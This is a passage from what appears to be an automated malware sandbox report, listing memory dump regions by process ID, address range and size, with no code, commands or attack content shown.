                          6.9MB

                        • memory/3436-852-0x0000000004E10000-0x0000000004E11000-memory.dmp
                          Filesize

                          4KB

                        • memory/3436-851-0x0000000004870000-0x0000000004871000-memory.dmp
                          Filesize

                          4KB

                        • memory/3796-855-0x0000000073840000-0x0000000073F2E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/3796-854-0x0000000000000000-mapping.dmp
                        • memory/3796-865-0x00000000051D1000-0x00000000051D2000-memory.dmp
                          Filesize

                          4KB

                        • memory/3796-867-0x0000000006D70000-0x0000000006D71000-memory.dmp
                          Filesize

                          4KB

                        • memory/3796-863-0x00000000051D0000-0x00000000051D1000-memory.dmp
                          Filesize

                          4KB

                        • memory/3796-866-0x0000000006940000-0x000000000694B000-memory.dmp
                          Filesize

                          44KB

                        • memory/3908-805-0x00000000044F0000-0x00000000044F1000-memory.dmp
                          Filesize

                          4KB

                        • memory/3908-801-0x00000000040F0000-0x00000000040F1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4032-43-0x0000000007560000-0x0000000007561000-memory.dmp
                          Filesize

                          4KB

                        • memory/4032-46-0x00000000075D0000-0x00000000075D1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4032-147-0x0000000007F50000-0x0000000007F51000-memory.dmp
                          Filesize

                          4KB

                        • memory/4032-152-0x0000000008EC0000-0x0000000008EC1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4032-27-0x0000000004400000-0x0000000004401000-memory.dmp
                          Filesize

                          4KB

                        • memory/4032-40-0x0000000006E60000-0x0000000006E61000-memory.dmp
                          Filesize

                          4KB

                        • memory/4032-20-0x0000000000000000-mapping.dmp
                        • memory/4032-33-0x00000000043F0000-0x00000000043F1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4032-144-0x000000007EBE0000-0x000000007EBE1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4032-164-0x00000000043F3000-0x00000000043F4000-memory.dmp
                          Filesize

                          4KB

                        • memory/4032-36-0x00000000043F2000-0x00000000043F3000-memory.dmp
                          Filesize

                          4KB

                        • memory/4032-64-0x0000000007FC0000-0x0000000007FC1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4032-120-0x0000000008CE0000-0x0000000008D13000-memory.dmp
                          Filesize

                          204KB

                        • memory/4032-24-0x0000000073840000-0x0000000073F2E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/4280-238-0x00000000072E2000-0x00000000072E3000-memory.dmp
                          Filesize

                          4KB

                        • memory/4280-226-0x0000000073840000-0x0000000073F2E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/4280-236-0x00000000072E0000-0x00000000072E1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4280-197-0x0000000000000000-mapping.dmp
                        • memory/4280-372-0x00000000072E4000-0x00000000072E6000-memory.dmp
                          Filesize

                          8KB

                        • memory/4280-371-0x00000000072E3000-0x00000000072E4000-memory.dmp
                          Filesize

                          4KB

                        • memory/4344-83-0x0000000000000000-mapping.dmp
                        • memory/4388-261-0x000000007EE00000-0x000000007EE01000-memory.dmp
                          Filesize

                          4KB

                        • memory/4388-108-0x0000000004222000-0x0000000004223000-memory.dmp
                          Filesize

                          4KB

                        • memory/4388-312-0x0000000004223000-0x0000000004224000-memory.dmp
                          Filesize

                          4KB

                        • memory/4388-99-0x0000000004220000-0x0000000004221000-memory.dmp
                          Filesize

                          4KB

                        • memory/4388-95-0x0000000073840000-0x0000000073F2E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/4388-85-0x0000000000000000-mapping.dmp
                        • memory/4448-279-0x000000007E8D0000-0x000000007E8D1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4448-109-0x0000000007050000-0x0000000007051000-memory.dmp
                          Filesize

                          4KB

                        • memory/4448-97-0x0000000073840000-0x0000000073F2E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/4448-341-0x0000000007053000-0x0000000007054000-memory.dmp
                          Filesize

                          4KB

                        • memory/4448-115-0x0000000007052000-0x0000000007053000-memory.dmp
                          Filesize

                          4KB

                        • memory/4448-87-0x0000000000000000-mapping.dmp
                        • memory/4504-101-0x0000000073840000-0x0000000073F2E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/4504-338-0x0000000006F13000-0x0000000006F14000-memory.dmp
                          Filesize

                          4KB

                        • memory/4504-116-0x0000000006F12000-0x0000000006F13000-memory.dmp
                          Filesize

                          4KB

                        • memory/4504-89-0x0000000000000000-mapping.dmp
                        • memory/4504-294-0x000000007EEA0000-0x000000007EEA1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4504-113-0x0000000006F10000-0x0000000006F11000-memory.dmp
                          Filesize

                          4KB

                        • memory/4700-184-0x000001E5F2036000-0x000001E5F2038000-memory.dmp
                          Filesize

                          8KB

                        • memory/4700-110-0x000001E5F2030000-0x000001E5F2032000-memory.dmp
                          Filesize

                          8KB

                        • memory/4700-158-0x000001E5F1F70000-0x000001E5F1F71000-memory.dmp
                          Filesize

                          4KB

                        • memory/4700-111-0x000001E5F2033000-0x000001E5F2035000-memory.dmp
                          Filesize

                          8KB

                        • memory/4700-176-0x000001E5F2270000-0x000001E5F2271000-memory.dmp
                          Filesize

                          4KB

                        • memory/4700-106-0x00007FF8177E0000-0x00007FF8181CC000-memory.dmp
                          Filesize

                          9.9MB

                        • memory/4700-102-0x0000000000000000-mapping.dmp
                        • memory/4744-410-0x0000000006F12000-0x0000000006F13000-memory.dmp
                          Filesize

                          4KB

                        • memory/4744-399-0x0000000073840000-0x0000000073F2E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/4744-406-0x0000000006F10000-0x0000000006F11000-memory.dmp
                          Filesize

                          4KB

                        • memory/4744-382-0x0000000000000000-mapping.dmp
                        • memory/4744-810-0x0000000006F13000-0x0000000006F14000-memory.dmp
                          Filesize

                          4KB

                        • memory/4932-216-0x00000000044A0000-0x00000000044A1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4932-234-0x00000000044A2000-0x00000000044A3000-memory.dmp
                          Filesize

                          4KB

                        • memory/4932-369-0x00000000044A4000-0x00000000044A6000-memory.dmp
                          Filesize

                          8KB

                        • memory/4932-180-0x0000000000000000-mapping.dmp
                        • memory/4932-208-0x0000000073840000-0x0000000073F2E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/4932-368-0x00000000044A3000-0x00000000044A4000-memory.dmp
                          Filesize

                          4KB

                        • memory/4932-563-0x000000007F1B0000-0x000000007F1B1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4976-186-0x0000000000000000-mapping.dmp
                        • memory/4976-594-0x000000007EC60000-0x000000007EC61000-memory.dmp
                          Filesize

                          4KB

                        • memory/4976-240-0x00000000068A2000-0x00000000068A3000-memory.dmp
                          Filesize

                          4KB

                        • memory/4976-239-0x00000000068A0000-0x00000000068A1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4976-377-0x00000000068A4000-0x00000000068A6000-memory.dmp
                          Filesize

                          8KB

                        • memory/4976-220-0x0000000073840000-0x0000000073F2E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/4976-375-0x00000000068A3000-0x00000000068A4000-memory.dmp
                          Filesize

                          4KB

                        • memory/5092-285-0x00000000044E2000-0x00000000044E3000-memory.dmp
                          Filesize

                          4KB

                        • memory/5092-673-0x000000007F190000-0x000000007F191000-memory.dmp
                          Filesize

                          4KB

                        • memory/5092-266-0x0000000000000000-mapping.dmp
                        • memory/5092-281-0x00000000044E0000-0x00000000044E1000-memory.dmp
                          Filesize

                          4KB

                        • memory/5092-272-0x0000000073840000-0x0000000073F2E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/5092-487-0x00000000044E4000-0x00000000044E6000-memory.dmp
                          Filesize

                          8KB

                        • memory/5092-485-0x00000000044E3000-0x00000000044E4000-memory.dmp
                          Filesize

                          4KB

                        • memory/5124-276-0x0000000073840000-0x0000000073F2E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/5124-289-0x00000000067A0000-0x00000000067A1000-memory.dmp
                          Filesize

                          4KB

                        • memory/5124-495-0x00000000067A4000-0x00000000067A6000-memory.dmp
                          Filesize

                          8KB

                        • memory/5124-676-0x000000007F620000-0x000000007F621000-memory.dmp
                          Filesize

                          4KB

                        • memory/5124-309-0x00000000067A2000-0x00000000067A3000-memory.dmp
                          Filesize

                          4KB

                        • memory/5124-494-0x00000000067A3000-0x00000000067A4000-memory.dmp
                          Filesize

                          4KB

                        • memory/5124-267-0x0000000000000000-mapping.dmp
                        • memory/5172-698-0x000000007E780000-0x000000007E781000-memory.dmp
                          Filesize

                          4KB

                        • memory/5172-269-0x0000000000000000-mapping.dmp
                        • memory/5172-505-0x0000000006844000-0x0000000006846000-memory.dmp
                          Filesize

                          8KB

                        • memory/5172-298-0x0000000006840000-0x0000000006841000-memory.dmp
                          Filesize

                          4KB

                        • memory/5172-504-0x0000000006843000-0x0000000006844000-memory.dmp
                          Filesize

                          4KB

                        • memory/5172-303-0x0000000006842000-0x0000000006843000-memory.dmp
                          Filesize

                          4KB

                        • memory/5172-284-0x0000000073840000-0x0000000073F2E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/5356-401-0x00000000070C0000-0x00000000070C1000-memory.dmp
                          Filesize

                          4KB

                        • memory/5356-403-0x00000000070C2000-0x00000000070C3000-memory.dmp
                          Filesize

                          4KB

                        • memory/5356-370-0x0000000000000000-mapping.dmp
                        • memory/5356-383-0x0000000073840000-0x0000000073F2E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/5356-535-0x00000000070C3000-0x00000000070C4000-memory.dmp
                          Filesize

                          4KB

                        • memory/5356-751-0x000000007EF90000-0x000000007EF91000-memory.dmp
                          Filesize

                          4KB

                        • memory/5356-536-0x00000000070C4000-0x00000000070C6000-memory.dmp
                          Filesize

                          8KB

                        • memory/5376-869-0x000000000040C91E-mapping.dmp
                        • memory/5376-870-0x0000000073840000-0x0000000073F2E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/5376-871-0x0000000000750000-0x0000000000762000-memory.dmp
                          Filesize

                          72KB

                        • memory/5376-874-0x0000000004BA0000-0x0000000004BA1000-memory.dmp
                          Filesize

                          4KB

                        • memory/5452-407-0x0000000002B70000-0x0000000002B71000-memory.dmp
                          Filesize

                          4KB

                        • memory/5452-391-0x0000000073840000-0x0000000073F2E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/5452-378-0x0000000000000000-mapping.dmp
                        • memory/5452-412-0x0000000002B72000-0x0000000002B73000-memory.dmp
                          Filesize

                          4KB

                        • memory/5452-543-0x0000000002B73000-0x0000000002B74000-memory.dmp
                          Filesize

                          4KB

                        • memory/5452-546-0x0000000002B74000-0x0000000002B76000-memory.dmp
                          Filesize

                          8KB

                        • memory/5452-754-0x000000007EB30000-0x000000007EB31000-memory.dmp
                          Filesize

                          4KB

                        • memory/5456-318-0x00000000004B0000-0x00000000004B1000-memory.dmp
                          Filesize

                          4KB

                        • memory/5456-462-0x0000000004DF1000-0x0000000004DF2000-memory.dmp
                          Filesize

                          4KB

                        • memory/5456-297-0x0000000000000000-mapping.dmp
                        • memory/5456-444-0x0000000006A40000-0x0000000006A6F000-memory.dmp
                          Filesize

                          188KB

                        • memory/5456-311-0x0000000073840000-0x0000000073F2E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/5456-337-0x0000000004DF0000-0x0000000004DF1000-memory.dmp
                          Filesize

                          4KB

                        • memory/5584-522-0x00000000066A4000-0x00000000066A6000-memory.dmp
                          Filesize

                          8KB

                        • memory/5584-521-0x00000000066A3000-0x00000000066A4000-memory.dmp
                          Filesize

                          4KB

                        • memory/5584-719-0x000000007F550000-0x000000007F551000-memory.dmp
                          Filesize

                          4KB

                        • memory/5584-319-0x0000000000000000-mapping.dmp
                        • memory/5584-332-0x0000000073840000-0x0000000073F2E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/5584-344-0x00000000066A2000-0x00000000066A3000-memory.dmp
                          Filesize

                          4KB

                        • memory/5584-342-0x00000000066A0000-0x00000000066A1000-memory.dmp
                          Filesize

                          4KB

                        • memory/5680-421-0x0000000073840000-0x0000000073F2E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/5680-436-0x00000000065D0000-0x00000000065D1000-memory.dmp
                          Filesize

                          4KB

                        • memory/5680-409-0x0000000000000000-mapping.dmp
                        • memory/5680-438-0x00000000065D2000-0x00000000065D3000-memory.dmp
                          Filesize

                          4KB

                        • memory/5680-811-0x00000000065D3000-0x00000000065D4000-memory.dmp
                          Filesize

                          4KB

                        • memory/5748-525-0x00000000071F3000-0x00000000071F4000-memory.dmp
                          Filesize

                          4KB

                        • memory/5748-350-0x00000000071F2000-0x00000000071F3000-memory.dmp
                          Filesize

                          4KB

                        • memory/5748-333-0x0000000000000000-mapping.dmp
                        • memory/5748-343-0x0000000073840000-0x0000000073F2E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/5748-526-0x00000000071F4000-0x00000000071F6000-memory.dmp
                          Filesize

                          8KB

                        • memory/5748-349-0x00000000071F0000-0x00000000071F1000-memory.dmp
                          Filesize

                          4KB

                        • memory/5748-723-0x000000007E320000-0x000000007E321000-memory.dmp
                          Filesize

                          4KB

                        • memory/5916-352-0x0000000073840000-0x0000000073F2E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/5916-523-0x0000000006DB3000-0x0000000006DB4000-memory.dmp
                          Filesize

                          4KB

                        • memory/5916-524-0x0000000006DB4000-0x0000000006DB6000-memory.dmp
                          Filesize

                          8KB

                        • memory/5916-716-0x000000007F4B0000-0x000000007F4B1000-memory.dmp
                          Filesize

                          4KB

                        • memory/5916-376-0x0000000006DB2000-0x0000000006DB3000-memory.dmp
                          Filesize

                          4KB

                        • memory/5916-347-0x0000000000000000-mapping.dmp
                        • memory/5916-367-0x0000000006DB0000-0x0000000006DB1000-memory.dmp
                          Filesize

                          4KB

                        • memory/5964-813-0x0000000006AF3000-0x0000000006AF4000-memory.dmp
                          Filesize

                          4KB

                        • memory/5964-461-0x0000000006AF0000-0x0000000006AF1000-memory.dmp
                          Filesize

                          4KB

                        • memory/5964-422-0x0000000000000000-mapping.dmp
                        • memory/5964-453-0x0000000006AF2000-0x0000000006AF3000-memory.dmp
                          Filesize

                          4KB

                        • memory/5964-445-0x0000000073840000-0x0000000073F2E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/6120-835-0x0000000006F03000-0x0000000006F04000-memory.dmp
                          Filesize

                          4KB

                        • memory/6120-600-0x0000000006F02000-0x0000000006F03000-memory.dmp
                          Filesize

                          4KB

                        • memory/6120-560-0x0000000000000000-mapping.dmp
                        • memory/6120-597-0x0000000006F00000-0x0000000006F01000-memory.dmp
                          Filesize

                          4KB

                        • memory/6120-573-0x0000000073840000-0x0000000073F2E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/6204-464-0x0000000000000000-mapping.dmp
                        • memory/6212-830-0x00000000068C3000-0x00000000068C4000-memory.dmp
                          Filesize

                          4KB

                        • memory/6212-553-0x0000000000000000-mapping.dmp
                        • memory/6212-589-0x00000000068C2000-0x00000000068C3000-memory.dmp
                          Filesize

                          4KB

                        • memory/6212-568-0x0000000073840000-0x0000000073F2E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/6212-583-0x00000000068C0000-0x00000000068C1000-memory.dmp
                          Filesize

                          4KB

                        • memory/6352-833-0x0000000007043000-0x0000000007044000-memory.dmp
                          Filesize

                          4KB

                        • memory/6352-587-0x0000000007040000-0x0000000007041000-memory.dmp
                          Filesize

                          4KB

                        • memory/6352-591-0x0000000007042000-0x0000000007043000-memory.dmp
                          Filesize

                          4KB

                        • memory/6352-569-0x0000000073840000-0x0000000073F2E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/6352-557-0x0000000000000000-mapping.dmp
                        • memory/6372-602-0x0000000000000000-mapping.dmp
                        • memory/6612-503-0x0000000000000000-mapping.dmp
                        • memory/6768-653-0x0000000000000000-mapping.dmp
                        • memory/6780-795-0x0000000000400000-0x0000000000412000-memory.dmp
                          Filesize

                          72KB

                        • memory/6780-844-0x0000000004DE0000-0x0000000004DE1000-memory.dmp
                          Filesize

                          4KB

                        • memory/6780-796-0x000000000040C91E-mapping.dmp
                        • memory/6780-798-0x0000000073840000-0x0000000073F2E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/6856-832-0x0000000007023000-0x0000000007024000-memory.dmp
                          Filesize

                          4KB

                        • memory/6856-520-0x0000000000000000-mapping.dmp
                        • memory/6856-549-0x0000000007022000-0x0000000007023000-memory.dmp
                          Filesize

                          4KB

                        • memory/6856-528-0x0000000073840000-0x0000000073F2E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/6856-539-0x0000000007020000-0x0000000007021000-memory.dmp
                          Filesize

                          4KB

                        • memory/6912-629-0x0000000000000000-mapping.dmp
                        • memory/6948-542-0x0000000004402000-0x0000000004403000-memory.dmp
                          Filesize

                          4KB

                        • memory/6948-829-0x0000000004403000-0x0000000004404000-memory.dmp
                          Filesize

                          4KB

                        • memory/6948-538-0x0000000004400000-0x0000000004401000-memory.dmp
                          Filesize

                          4KB

                        • memory/6948-534-0x0000000073840000-0x0000000073F2E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/6948-527-0x0000000000000000-mapping.dmp
                        • memory/7000-834-0x0000000006FA3000-0x0000000006FA4000-memory.dmp
                          Filesize

                          4KB

                        • memory/7000-529-0x0000000000000000-mapping.dmp
                        • memory/7000-545-0x0000000006FA0000-0x0000000006FA1000-memory.dmp
                          Filesize

                          4KB

                        • memory/7000-548-0x0000000006FA2000-0x0000000006FA3000-memory.dmp
                          Filesize

                          4KB

                        • memory/7000-541-0x0000000073840000-0x0000000073F2E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/7092-690-0x0000000000000000-mapping.dmp